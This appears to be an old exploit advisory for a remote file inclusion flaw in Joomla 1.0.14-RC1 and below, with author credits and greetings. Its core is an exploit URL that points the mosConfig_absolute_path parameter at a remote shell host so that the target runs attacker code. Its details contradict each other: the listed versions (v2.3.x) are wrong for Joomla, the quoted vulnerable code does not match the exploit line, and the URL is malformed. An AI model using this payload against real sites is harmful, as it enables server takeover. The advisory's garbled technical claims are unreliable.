Joomla versions 1.0.14-RC1 and below suffer from a remote file inclusion flaw in index.php.
ebfb5a0085a9e3d8775a3af3cc5ecaec62bc0f78d1ad8b75f75186161107d6a4
#==============================================================================================
#Joomla <= v1.0.14-RC1(Index.php) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#
#
#Version : v2.3.1 & v2.3.0
#
#================================================================================================
#Bug in : Index.php
#
#Vlu Code :
#--------------------------------
# include_once($config['path_src_include'] . "common.inc.php");
#
#
#================================================================================================
#
#Exploit :include( $mosConfig_absolute_path .'/offlinebar.php'
#--------------------------------
#
#http://sitename.com/[Script Path]/index.php?mosConfig_absolute_path=http//www.shellurl.com.com
#
#
#================================================================================================
#Discoverd By : Fegla
#
#Conatact : alex_zooz_zooz[at]hotmail.com
#
#GreetZ : Sub-Code ,ShikaA , Wizard CC
==================================================================================================